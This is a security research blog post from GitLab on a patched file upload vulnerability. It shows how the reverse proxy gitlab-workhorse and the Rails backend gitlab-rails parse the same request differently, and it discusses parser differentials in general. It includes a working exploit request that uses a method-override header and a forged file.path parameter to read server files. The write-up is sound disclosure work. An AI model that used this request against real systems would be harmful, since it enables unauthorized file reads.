---
title: "How to exploit parser differentials"
author: Joern Schneeweisz
author_gitlab: joernchen
author_twitter: joernchen
categories: security
image_title: '/images/blogimages/closeup-photo-of-black-and-blue-keyboard-1194713.jpg'
description: "Your guide to abusing 'language barriers' between web components."
tags: security, security research
twitter_text: "An in-depth guide to abusing 'language barriers' between web components and exploiting parser differentials"
postType: content marketing
merch_banner: merch_one
---

The move to a microservices-based architecture creates more attack surface for nefarious actors. So when our [security researchers](/handbook/engineering/security/#security-research) discovered a file upload vulnerability within GitLab, we patched it right away in our [GitLab 12.7.4 security release](/releases/2020/01/30/security-release-gitlab-12-7-4-released). Here we dive deeper into the problems that led to this vulnerability, and use it to illustrate the underlying concept of parser differentials.

## File Uploads in GitLab

To understand the vulnerability, we need to take a closer look at how GitLab handles file uploads and at the components involved.

### GitLab Workhorse

The first relevant component is GitLab's very own reverse proxy, [`gitlab-workhorse`](https://gitlab.com/gitlab-org/gitlab-workhorse/). `gitlab-workhorse` fulfills a variety of tasks, but for this example we only care about certain kinds of file uploads.

The second component is [`gitlab-rails`](https://gitlab.com/gitlab-org/gitlab), the Ruby on Rails-based heart of GitLab. It is the main application and implements most of GitLab's business logic.

The following source code excerpts from `gitlab-workhorse` are based on the [`8.18.0`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/tags/v8.18.0) release, which was the most recent version at the time the vulnerability was identified.
Consider the following route, defined in [`internal/upstream/routes.go`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/upstream/routes.go#L207-208), which handles file uploads for [Conan](https://conan.io/) packages:

```go
// Conan Artifact Repository
route("PUT", apiPattern+`v4/packages/conan/`, filestore.BodyUploader(api, proxy, nil)),
```

The route defined above passes any `PUT` request to paths underneath `/api/v4/packages/conan/` to the [`BodyUploader`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/filestore/body_uploader.go#L40-79). Within the `BodyUploader`, some magic happens. Well, actually, it's not magic: the `BodyUploader` receives the uploaded file and lets the `gitlab-rails` backend know where the file has been placed. This happens in [`internal/filestore/file_handler.go`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/filestore/file_handler.go#L52-81).

Also worth mentioning: any request that matches no route in `gitlab-workhorse` is passed on to the backend without modification. That's especially important in our discussion for non-`PUT` requests under `/api/v4/packages/conan/`.

```go
// GitLabFinalizeFields returns a map with all the fields GitLab Rails needs in order to finalize the upload.
func (fh *FileHandler) GitLabFinalizeFields(prefix string) map[string]string {
	data := make(map[string]string)
	key := func(field string) string {
		if prefix == "" {
			return field
		}

		return fmt.Sprintf("%s.%s", prefix, field)
	}

	if fh.Name != "" {
		data[key("name")] = fh.Name
	}
	if fh.LocalPath != "" {
		data[key("path")] = fh.LocalPath
	}
	if fh.RemoteURL != "" {
		data[key("remote_url")] = fh.RemoteURL
	}
	if fh.RemoteID != "" {
		data[key("remote_id")] = fh.RemoteID
	}
	data[key("size")] = strconv.FormatInt(fh.Size, 10)
	for hashName, hash := range fh.hashes {
		data[key(hashName)] = hash
	}

	return data
}
```

In other words, `gitlab-workhorse` replaces the uploaded file in the request with the path where it has stored the file on disk, so that the `gitlab-rails` backend knows where to pick it up. Observe the following original request, as received by `gitlab-workhorse`:

```
PUT /api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py HTTP/1.1
Host: localhost
User-Agent: Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Checksum-Sha1: 93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78
Content-Length: 1765
Authorization: Bearer [.. shortened ..]

from conans import ConanFile, CMake, tools

class HelloConan(ConanFile):
    name = "Hello"
[.. shortened ..]
```

This is what the request looks like to `gitlab-rails` after `gitlab-workhorse` has processed it (excerpted from `api_json.log`):

```json
{
  "time": "2020-02-20T14:49:44.738Z",
  "severity": "INFO",
  "duration": 201.93,
  "db": 67.34,
  "view": 134.59,
  "status": 200,
  "method": "PUT",
  "path": "/api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py",
  "params": [
    { "key": "file.md5", "value": "719f0319f1fd5f6fcbc2433cc0008817" },
    { "key": "file.path", "value": "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467" },
    { "key": "file.sha1", "value": "93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78" },
    { "key": "file.sha256", "value": "f7059b223cd4d32002e5e34ab1ae5b4ea12f3bd0326589b00d5e910ce02c1f3a" },
    { "key": "file.sha512", "value": "efbe75ea58bd817d42fd9ca5ac556abd6fbe3236f66dfad81d508b5860252d32d1b1868ee03c7f4c6174a0ba6cc920a574b5865ca509f36c451113c9108f9a36" },
    { "key": "file.size", "value": "1765" }
  ],
  "host": "localhost",
  "remote_ip": ",",
  "ua": "Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0",
  "route": "/api/:version/packages/conan/v1/files/:package_name/:package_version/:package_username/:package_channel/:recipe_revision/export/:file_name",
  "user_id": 1,
  "username": "root",
  "queue_duration": 16.59,
  "correlation_id": "aSEqrgEfvX9"
}
```

In particular, the `params` entry `file.path` is of interest, as it denotes the file system path where `gitlab-workhorse` has placed the uploaded file.

### `gitlab-rails`

`gitlab-rails` handles this modified request in [`lib/uploaded_file.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/v12.7.4-ee/lib/uploaded_file.rb#L45-66), within the `from_params` method:

```ruby
def self.from_params(params, field, upload_paths)
  path = params["#{field}.path"]
  remote_id = params["#{field}.remote_id"]
  return if path.blank? && remote_id.blank?

  file_path = nil
  if path
    file_path = File.realpath(path)

    paths = Array(upload_paths) << Dir.tmpdir
    unless self.allowed_path?(file_path, paths.compact)
      raise InvalidPathError, "insecure path used '#{file_path}'"
    end
  end

  UploadedFile.new(file_path,
    filename: params["#{field}.name"],
    content_type: params["#{field}.type"] || 'application/octet-stream',
    sha256: params["#{field}.sha256"],
    remote_id: remote_id,
    size: params["#{field}.size"])
end
```

Here we can see how the uploaded file reference is handled. After `File.realpath` resolves the given path, the `paths` / `allowed_path?` block implements a whitelist of specific paths from which a file uploaded via `gitlab-workhorse` will be accepted. `Dir.tmpdir`, which typically resolves to `/tmp`, is added to the whitelist as well. Afterwards, a new `UploadedFile` is constructed from `file.path` and the other parameters `gitlab-workhorse` has set.

## `gitlab-workhorse` bypass

We've now seen how both `gitlab-workhorse` and `gitlab-rails` handle file uploads for Conan packages. To recap, the flow goes as follows:

```mermaid
sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: PUT request to conan registry
    workhorse->>workhorse: Place uploaded file on disk and re-write PUT request
    workhorse->>Rails: Pass on modified PUT request
    Rails->>Rails: Pick up file from disk and store in UploadedFile
```

From an attacker's perspective, it would be nice to meddle with the modified `PUT` request. In particular, control over the `file.path` parameter would allow us to grab arbitrary files from `/tmp` and the defined `upload_paths`. But since `gitlab-workhorse` sits right in front of `gitlab-rails`, we can't just pass those parameters or otherwise interact with `gitlab-rails` without going through `gitlab-workhorse`.
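The whitelist in `from_params` bounds what a forged `file.path` could reach: resolve the path first, then require that it lies inside one of the allowed directories. The Go sketch below illustrates that idea under stated assumptions; it is not GitLab's `allowed_path?` (whose body isn't shown above), and the helper name `isAllowedPath` is hypothetical. It also shows why a naive string-prefix comparison would be too lax.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// isAllowedPath is a hypothetical helper: it reports whether resolvedPath
// lies strictly inside one of allowedDirs. resolvedPath is assumed to be
// absolute and already free of symlinks (in from_params, File.realpath
// performs that step before the check).
func isAllowedPath(resolvedPath string, allowedDirs []string) bool {
	target := filepath.Clean(resolvedPath)
	for _, dir := range allowedDirs {
		rel, err := filepath.Rel(filepath.Clean(dir), target)
		if err != nil {
			continue
		}
		// A relative path that starts by climbing up with ".." is outside dir.
		outside := rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator))
		// "." means target is the directory itself, not a file inside it.
		if rel != "." && !outside {
			return true
		}
	}
	return false
}

func main() {
	allowed := []string{"/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads", "/tmp"}

	for _, p := range []string{
		"/tmp/test1234",   // inside /tmp, so it passes the check
		"/tmpevil/secret", // shares the "/tmp" string prefix but is outside /tmp
		"/etc/passwd",     // outside every allowed directory
	} {
		naive := strings.HasPrefix(p, "/tmp")
		fmt.Printf("%-16s naive=%v allowed=%v\n", p, naive, isAllowedPath(p, allowed))
	}
}
```

Note that even a correct check still lets whoever controls `file.path` pick any file inside the allowed directories, which is why getting such a parameter past `gitlab-workhorse` matters.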
It turns out we can reach `gitlab-rails` with our own `file.path` after all, by leveraging the fact that `gitlab-workhorse` parses HTTP requests differently from `gitlab-rails`. In particular, we can use [`Rack::MethodOverride`](https://www.rubydoc.info/gems/rack/Rack/MethodOverride) in `gitlab-rails`, a middleware that is enabled by default in Ruby on Rails applications. The `Rack::MethodOverride` middleware allows us to send a `POST` request and let `gitlab-rails` know **"well, actually this is a `PUT` request! ¯\\\_(ツ)\_/¯ "**. With this little trick we can sneak past the `gitlab-workhorse` route that would intercept the `PUT` request, as `gitlab-workhorse` is not aware of the method override and only sees a `POST`.

So by specifying either a `_method=PUT` parameter or an `X-HTTP-METHOD-OVERRIDE: PUT` HTTP header, we can point `gitlab-rails` directly to files on disk. The method override is used a lot in Ruby on Rails applications to allow simple `<form>`-based `POST` requests to use other [`REST`](https://de.wikipedia.org/wiki/Representational_State_Transfer)-based methods like `PUT` and `DELETE`, by overriding the `<form>`'s `POST` request with the `_method` parameter.

So a `POST` request to the right Conan endpoint with `file.path` and `file.size` parameters will do the trick. A full request using this bypass would look like this:

```
POST /api/v4/packages/conan/v1/files/Hello/0.1/lol+wat/beta/0/export/conanmanifest.txt?file.size=4&file.path=/tmp/test1234 HTTP/1.1
Host: localhost
User-Agent: Conan/1.21.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-HTTP-Method-Override: PUT
X-Checksum-Deploy: true
X-Checksum-Sha1: ee96149f7b93af931d4548e9562484bdb6ac8fda
Content-Length: 4
Authorization: Bearer [.. shortened ..]

asdf
```

Instead of uploading a file, this request lets us get hold of the file `/tmp/test1234` from the GitLab server's file system.

To recap, the flow to exploit this issue looks as follows:

```mermaid
sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: POST request to conan registry
    workhorse->>workhorse: Route does not match anything
    workhorse->>Rails: Pass on unmodified POST request
    Rails->>Rails: Interpret as PUT and pick up file from disk
```

We fixed this issue within `gitlab-workhorse` by [signing requests that pass through `gitlab-workhorse`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/commit/3a34323b104be89e92db49828268f0bfd831e75a); the signature is then verified on [the `gitlab-rails` side](https://gitlab.com/gitlab-org/gitlab/-/commit/043c664908e474f34e62e88365be0fc945f1d0b3).

## How parser differentials can introduce vulnerabilities

Let's take a huge step back and look at what just happened from a high-level perspective. Both `gitlab-workhorse` and `gitlab-rails` looked at the same `POST` request, but `gitlab-rails` ultimately saw a `PUT` request due to the overridden HTTP method.
What occurred here is a case of a **parser differential**: `gitlab-workhorse` and `gitlab-rails` parsed the incoming HTTP request differently. The term parser differential originates from the [Language-theoretic Security approach](http://langsec.org). It denotes the fact that two (or more) different parsers "understand" the very same message in different ways. Or, as the [LangSec handout](http://langsec.org/bof-handout.pdf) puts it:

> Different interpretation of messages or data streams by components breaks any assumptions that components adhere to a shared specification and so introduces inconsistent state and unanticipated computation.

Indeed, such issues and the resulting _unanticipated computation_ are becoming more and more common in modern web environments. The days of web applications being a stand-alone bunch of scripts invoked on a web server are long gone. The rise of microservices leads to complex environments in which the very same message (or HTTP request) might be interpreted by several different services in several different ways. As the example above shows, this sometimes comes with security implications.

From the point of view of a pragmatic bug hunter, parser differentials are very interesting, as these issues can yield unique security bugs. Consider, for instance, this [RCE in CouchDB](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). The [HTTP desync attack technique](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn), which has gotten a lot of attention in the bug bounty community, is also a matter of parser differentials.

From a developer's perspective, we need to be aware of other components and their parsing behavior in order to avoid security issues that arise from interpreting the same message differently.
Cover Photo by [Marta Branco](https://www.pexels.com/@martabranco?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels) on [Pexels](https://www.pexels.com/photo/closeup-photo-of-black-and-blue-keyboard-1194713/?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels) {: .note}